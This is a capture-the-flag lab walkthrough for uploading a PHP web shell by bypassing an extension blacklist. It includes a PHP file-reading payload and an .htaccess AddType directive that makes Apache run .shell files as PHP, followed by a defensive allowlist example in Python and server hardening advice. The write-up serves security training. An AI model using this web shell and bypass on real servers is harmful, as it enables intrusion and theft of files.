8.4 Lab: Web shell upload via extension blacklist bypass | 2024
Karthikeyan Nagaraj
Description
This lab contains a vulnerable image upload function. Certain file extensions are blacklisted, but this defense can be bypassed due to a fundamental flaw in the configuration of this blacklist.
To solve the lab, upload a basic PHP web shell, then use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner.
You can log in to your own account using the following credentials: wiener:peter
Solution
- Log in to your account with wiener:peter
- Turn on the proxy and upload shell.php, which contains the code below:
<?php echo file_get_contents('/home/carlos/secret'); ?>
- Send the request to Repeater and change the following values:
Remove the payload,
filename=".htaccess",
Content-Type: text/plain,
Add the directive AddType application/x-httpd-php .shell in place of the payload. This tells Apache to handle files with the .shell extension as PHP.
- Send the request, undo the changes, and send the same request again with the filename changed to shell.shell
- Now go to My-Account, refresh the page, right-click the image, and click Open Image in New Tab
- Copy the Secret code and paste it in the Solution to solve the Lab
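Why the blacklist fails, as an added example (not code from the lab or from this write-up): an extension blacklist accepts both .htaccess and shell.shell, while an allowlist with server-chosen file names rejects them. The blacklist contents, the function names and the avatar.png sample are assumptions made for illustration.

```python
import os
import re
import uuid

# Assumed blacklist of the kind the lab describes (the lab's real list is not shown).
BLACKLIST = {".php", ".php5", ".phtml", ".phar"}
# Allowlist for an avatar upload: the only extensions the feature needs.
ALLOWLIST = {".jpg", ".jpeg", ".png", ".gif"}
SAFE_STEM = re.compile(r"[A-Za-z0-9_-]{1,64}")


def blacklist_accepts(filename: str) -> bool:
    """Flawed check: reject known-bad extensions, accept everything else."""
    ext = os.path.splitext(filename)[1].lower()
    return ext not in BLACKLIST


def allowlist_accepts(filename: str) -> bool:
    """Hardened check: accept only a plain '<stem>.<image extension>' name."""
    name = os.path.basename(filename.replace("\\", "/"))
    if name != filename or name.startswith("."):
        return False  # path components, or dotfiles such as .htaccess
    stem, ext = os.path.splitext(name)
    return bool(SAFE_STEM.fullmatch(stem)) and ext.lower() in ALLOWLIST


def stored_name(filename: str) -> str:
    """Server-chosen name, so the client never controls the name on disk."""
    if not allowlist_accepts(filename):
        raise ValueError("upload rejected")
    return uuid.uuid4().hex + os.path.splitext(filename)[1].lower()


def compare(filenames):
    """Return {filename: (blacklist verdict, allowlist verdict)}."""
    return {f: (blacklist_accepts(f), allowlist_accepts(f)) for f in filenames}


if __name__ == "__main__":
    # The three names used in the walkthrough, plus a constructed legitimate avatar.
    names = ["shell.php", ".htaccess", "shell.shell", "avatar.png"]
    for name, verdicts in compare(names).items():
        print(f"{name:12} blacklist={verdicts[0]!s:5} allowlist={verdicts[1]}")
```

Filename validation is only part of the fix: the upload directory should also be served with per-directory overrides disabled (AllowOverride None in Apache) and without script execution, so an uploaded file cannot change how the server handles its neighbours.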
Thank you for Reading!
Happy Ethical Hacking ~
Author: Karthikeyan Nagaraj ~ Cyberw1ng